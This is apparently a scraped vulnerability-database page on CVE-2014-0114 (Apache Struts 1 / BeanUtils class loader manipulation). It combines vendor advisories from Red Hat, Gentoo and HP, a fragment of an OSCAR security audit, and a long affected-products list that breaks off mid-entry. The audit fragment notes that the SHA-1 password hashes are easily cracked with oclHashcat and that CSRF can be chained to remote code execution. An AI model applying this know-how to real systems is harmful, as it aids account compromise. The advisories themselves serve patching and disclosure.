Passwords are stored as SHA-1 hashes; unless unusually complex, passwords stored in that manner are typically easily recoverable with a tool such as oclHashcat. In OSCAR each hash is stored as a string of decimal numbers, rather than hexadecimal or raw bytes. This somewhat non-traditional representation adds a bit of programming work to the cracking process, but does not represent a major impediment to attack.
=== OVE-20160329-0009: Cross-site request forgery ===
The application lacks protection against cross-site request forgery attacks. A CSRF attack could be used against an administrator to exploit the deserialization RCE in a manner similar to the example provided with OVE-20160329-0004. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: struts security update Advisory ID: RHSA-2014:0474-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0474.html Issue date: 2014-05-07 CVE Names: CVE-2014-0114 =====================================================================
- Summary:
Updated struts packages that fix one security issue are now available for Red Hat Enterprise Linux 5.
The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.
- Relevant releases/architectures:
RHEL Desktop Workstation (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64
- This could lead to remote code execution under certain conditions. (CVE-2014-0114)
All struts users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using struts must be restarted for this update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters
- Package List:
RHEL Desktop Workstation (v. 5 client):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/struts-1.2.9-4jpp.8.el5_10.src.rpm
i386: struts-1.2.9-4jpp.8.el5_10.i386.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.i386.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.i386.rpm struts-manual-1.2.9-4jpp.8.el5_10.i386.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.i386.rpm
x86_64: struts-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-manual-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/struts-1.2.9-4jpp.8.el5_10.src.rpm
i386: struts-1.2.9-4jpp.8.el5_10.i386.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.i386.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.i386.rpm struts-manual-1.2.9-4jpp.8.el5_10.i386.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.i386.rpm
ia64: struts-1.2.9-4jpp.8.el5_10.ia64.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.ia64.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.ia64.rpm struts-manual-1.2.9-4jpp.8.el5_10.ia64.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.ia64.rpm
ppc: struts-1.2.9-4jpp.8.el5_10.ppc.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.ppc.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.ppc.rpm struts-manual-1.2.9-4jpp.8.el5_10.ppc.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.ppc.rpm
s390x: struts-1.2.9-4jpp.8.el5_10.s390x.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.s390x.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.s390x.rpm struts-manual-1.2.9-4jpp.8.el5_10.s390x.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.s390x.rpm
x86_64: struts-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-manual-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2014-0114.html https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFTacDGXlSAg2UNWIIRAhvbAJ0Za5jRat54AcgbIdHKlzbZN1y1hACcC8DR HJqJt2S278nXdfwLyGc7EJQ= =qMuX -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201607-09
https://security.gentoo.org/
Severity: Normal Title: Commons-BeanUtils: Arbitrary code execution Date: July 20, 2016 Bugs: #534498 ID: 201607-09
Synopsis
Apache Commons BeanUtils does not properly suppress the class property, which could lead to the remote execution of arbitrary code.
Workaround
There is no known workaround at this time.
Resolution
All Commons BeanUtils users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/commons-beanutils-1.9.2"
References
[ 1 ] CVE-2014-0114 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0114
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201607-09
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. Description:
AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. For further information, refer to the release notes linked to in the References section. Solution:
Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.
The References section of this erratum contains a download link (you must log in to download the update). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04311273
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04311273 Version: 1
HPSBGN03041 rev.1 - HP IceWall Configuration Manager running Apache Struts, Remote Execution of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2014-05-26 Last Updated: 2014-05-26
Potential Security Impact: Remote execution of arbitrary code
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP IceWall Configuration Manager running Apache Struts.
References: CVE-2014-0114, SSRT101566
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP IceWall Configuration Manager 3.0 running Apache Struts 1
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-0114 (AV:N/AC:L/Au:S/C:P/I:P/A:P) 6.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided mitigation information to protect against potential risk to HP IceWall Configuration Manager running Apache Struts.
Mitigation information for the Apache Struts vulnerability (CVE-2014-0114) is available at the following location:
http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-a pplications/ba-p/6463188#.U2J7xeaSxro
Japanese information is available at the following location:
http://www.hp.com/jp/icewall_patchaccess
Note: The HP IceWall product is only available in Japan.
HISTORY Version:1 (rev.1) - 26 May 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.4"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.7"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.6"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.3.10"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.2"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.1"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.3.5"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.8"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.3.8"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.9"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.8,
"vendor": "hitachi",
"version": "-09-00-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-09-50-03"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-09-50-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-09-10-10"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-09-00-12"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-08-50-13"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-08-50-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-10-00-03"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-10-00-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-09-10-00"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "1.0.2"
},
{
"_id": null,
"model": "tiered storage manager software -00 )",
"scope": "eq",
"trust": 1.2,
"vendor": "hitachi",
"version": "7.1.1"
},
{
"_id": null,
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 1.2,
"vendor": "hitachi",
"version": "7.3-00"
},
{
"_id": null,
"model": "commons beanutils",
"scope": "lte",
"trust": 1.0,
"vendor": "apache",
"version": "1.9.1"
},
{
"_id": null,
"model": "struts",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "1.0"
},
{
"_id": null,
"model": "device manager software -00 )",
"scope": "eq",
"trust": 0.9,
"vendor": "hitachi",
"version": "7.3"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.9,
"vendor": "hitachi",
"version": "7.4-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.9,
"vendor": "hitachi",
"version": "-08-11-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.9,
"vendor": "hitachi",
"version": "-08-00-00"
},
{
"_id": null,
"model": "openclinic ga",
"scope": "eq",
"trust": 0.8,
"vendor": "openclinic ga",
"version": null
},
{
"_id": null,
"model": "openclinic ga",
"scope": "eq",
"trust": 0.8,
"vendor": "openclinic ga",
"version": "version 5.09.02"
},
{
"_id": null,
"model": "openclinic ga",
"scope": "eq",
"trust": 0.8,
"vendor": "openclinic ga",
"version": "version 5.89.05b"
},
{
"_id": null,
"model": "terasoluna server framework for java",
"scope": "eq",
"trust": 0.8,
"vendor": "ntt data",
"version": "2.0.0.1 to 2.0.5.1"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-03"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"_id": null,
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-00"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-08-11-08"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-00"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"_id": null,
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-00"
},
{
"_id": null,
"model": "jp1/performance management manager web option",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-07-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-08-00-12"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-03"
},
{
"_id": null,
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-01"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-02"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-04"
},
{
"_id": null,
"model": "infosphere information server",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-01"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "7.4.0-02"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-00"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "7.4.0-01"
},
{
"_id": null,
"model": "infosphere information server",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.0-06"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-02"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-02"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.0-00"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "8.0.0-03"
},
{
"_id": null,
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"_id": null,
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "8.0.0-04"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-02"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-04"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "jp1/performance management manager web option",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-07-54"
},
{
"_id": null,
"model": "infosphere information server",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "8.1"
},
{
"_id": null,
"model": "infosphere information server",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "8.7"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-01"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-08-10-08"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-01"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-08-10-00"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.17"
},
{
"_id": null,
"model": "openpages",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"_id": null,
"model": "device manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.1"
},
{
"_id": null,
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.3.0"
},
{
"_id": null,
"model": "device manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"_id": null,
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.6-00"
},
{
"_id": null,
"model": "security qradar",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "tivoli storage manager administration center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3"
},
{
"_id": null,
"model": "tivoli workload scheduler z/os connector",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "records manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "retail clearance optimization engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.0"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.401"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "big-ip aam",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5"
},
{
"_id": null,
"model": "social media analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.3"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-00"
},
{
"_id": null,
"model": "terasoluna server framework for java",
"scope": "ne",
"trust": 0.3,
"vendor": "ntt data",
"version": "2.0.5.2"
},
{
"_id": null,
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"_id": null,
"model": "big-ip webaccelerator hf7",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"_id": null,
"model": "lotus expeditor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"_id": null,
"model": "vcenter server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "5.1"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.1"
},
{
"_id": null,
"model": "business process manager standard",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"_id": null,
"model": "tivoli application dependency discovery manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.2"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "device manager software (solaris(x6",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0-06(x64))"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "3.5.0"
},
{
"_id": null,
"model": "device manager software (linux(suse",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "fuse esb enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7.1.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.43"
},
{
"_id": null,
"model": "ds8870",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.0"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"_id": null,
"model": "knowledge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.6.0"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.2"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.13"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"_id": null,
"model": "tiered storage manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "tivoli endpoint manager for remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0.1"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"_id": null,
"model": "content analytics with enterprise search",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0"
},
{
"_id": null,
"model": "xp p9000 tiered storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "1.1.0-00"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.47"
},
{
"_id": null,
"model": "websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.5"
},
{
"_id": null,
"model": "tivoli dynamic workload console",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.6.0.0"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "linux enterprise software development kit sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.1.0"
},
{
"_id": null,
"model": "big-ip edge gateway hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"_id": null,
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.1"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.1"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "secure analytics 2013.2r8",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"_id": null,
"model": "tivoli endpoint manager for remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"_id": null,
"model": "job management partner 1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-0"
},
{
"_id": null,
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.41"
},
{
"_id": null,
"model": "content manager records enabler",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0-06"
},
{
"_id": null,
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.1.19"
},
{
"_id": null,
"model": "openpages grc platform",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.1"
},
{
"_id": null,
"model": "content navigator",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.1"
},
{
